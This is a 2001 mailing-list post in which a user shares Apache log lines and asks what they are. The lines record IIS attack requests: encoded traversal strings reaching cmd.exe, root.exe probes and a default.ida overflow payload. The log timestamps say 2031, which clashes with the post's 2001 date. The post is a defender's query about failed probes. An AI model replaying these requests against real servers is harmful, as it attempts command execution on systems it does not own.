[wplug] weird apache logs
coldfire
rolick571 at duq.edu
Thu Dec 27 14:19:16 EST 2001
i've been getting some crazy get requests in my logs ... my guess is that
they are some kind of nt or iis exploits ... just not sure ... here are
some ..
165.229.57.211 - - [27/Dec/2031:00:39:28 -0500] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 275
165.229.57.211 - - [27/Dec/2031:00:39:28 -0500] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 273
165.229.57.211 - - [27/Dec/2031:00:39:29 -0500] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 283
165.229.57.211 - - [27/Dec/2031:00:39:29 -0500] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 283
165.229.57.211 - - [27/Dec/2031:00:39:30 -0500] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
165.229.57.211 - - [27/Dec/2031:00:39:30 -0500] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 314
165.229.57.211 - - [27/Dec/2031:00:39:31 -0500] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 314
165.229.57.211 - - [27/Dec/2031:00:39:31 -0500] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 330
165.229.57.211 - - [27/Dec/2031:00:39:32 -0500] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
165.229.57.211 - - [27/Dec/2031:00:39:32 -0500] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
165.229.57.211 - - [27/Dec/2031:00:39:32 -0500] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
165.229.57.211 - - [27/Dec/2031:00:39:33 -0500] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
165.229.57.211 - - [27/Dec/2031:00:39:33 -0500] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 280
165.229.57.211 - - [27/Dec/2031:00:39:34 -0500] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 280
165.229.57.211 - - [27/Dec/2031:00:39:34 -0500] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
165.229.57.211 - - [27/Dec/2031:00:39:35 -0500] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
another:
209.83.111.164 - - [19/Dec/2031:04:03:51 -0500] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 400 317
...
i've received several of these from ips which have no dns entries or
rdns entries ... i'm not worried. just curious.
coldie
More information about the wplug
mailing list